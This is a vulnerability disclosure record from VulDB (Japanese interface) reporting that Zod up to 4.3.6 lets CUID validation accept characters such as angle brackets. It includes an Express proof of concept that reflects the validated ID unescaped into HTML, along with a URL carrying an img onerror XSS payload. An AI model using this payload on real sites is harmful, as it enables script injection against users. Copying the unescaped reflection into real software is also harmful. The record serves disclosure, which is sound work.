提出 #796749: colinhacks Zod <=4.3.6 Improper Input Validation情報

タイトル	colinhacks Zod <=4.3.6 Improper Input Validation
説明	### Summary Zod provides functionality to validate data input, primarily from users, and thousands of websites rely on its validation. The CUID data type should only allow alphanumeric characters. Even though CUID is now considered obsolete and the standard recommendation is to use CUID2, Zod should still prevent unsafe characters such as `{} ' ; < >`, which can lead to XSS, SQL Injection, or Command Injection. ### Details This is the vulnerable regex line: https://github.com/colinhacks/zod/blob/c7805073fef5b6b8857307c3d4b3597a70613bc2/packages/zod/src/v4/core/regexes.ts#L3 ### PoC XSS exploiting the trust of CUID input. ```javascript const express = require('express'); const { z, ZodError } = require('zod'); const app = express(); const PORT = 3000; const CuidSchema = z.object({ id: z.cuid('The provided ID is not a valid CUID.').min(1, 'The ID parameter is required.'), }); const validateCuid = (req, res, next) => { try { const validatedData = CuidSchema.parse(req.query); req.validatedQuery = validatedData; next(); } catch (error) { if (error instanceof ZodError) { return res.status(400).json({ status: 'error', message: 'Input validation failed.', errors: error.issues.map(issue => ({ path: issue.path.join('.'), message: issue.message })) }); } return res.status(500).json({ status: 'error', message: 'Internal server error.' }); } }; app.get('/item', validateCuid, (req, res) => { const validCuid = req.validatedQuery.id; res.status(200).send(` <!DOCTYPE html> <html lang="en"> <body> <h1>Valid CUID Received</h1> <p>The provided CUID is: <strong>${validCuid}</strong></p> </body> </html> `); }); app.listen(PORT, () => { console.log(`Server running at http://localhost:${PORT}`); console.log(`Test a valid route: http://localhost:${PORT}/item?id=ck0a79p0000002p572b1v2s8v`); console.log(`Test an invalid route: http://localhost:${PORT}/item?id=c%3Cstrong%3E%3Cimg/src=%221%22onerror=alert(1)%3Ek0a79p0000002p572b1v2s8v`); }); ``` <img width="1633" height="241" alt="image" src="https://github.com/user-attachments/assets/f36c40ca-e992-4642-94b8-6810f7fe8eed" /> ### Impact Improper input validation is a critical security flaw that can lead to severe vulnerabilities like Cross-Site Scripting (XSS), SQL Injection (SQLi), and Remote Code Execution (RCE). This makes it extremely critical that input be strictly limited to alphanumeric characters whenever possible. By enforcing this restriction, you prevent malicious characters (like quotes, angle brackets, or semicolons) from being processed by the system's runtime, database, or browser, effectively mitigating these injection risks.
ユーザー	dsonbacker (UID 46970)
送信	2026年04月03日 23:54 (22 日 ago)
モデレーション	2026年04月24日 21:38 (21 days later)
ステータス	承諾済み
VulDBエントリ	359543 [colinhacks Zod 迄 4.3.6 CUID Data Type regexes.ts SQLインジェクション]
ポイント	17

◂ 前概要次 ▸

Do you need the next level of professionalism?

Upgrade your account now!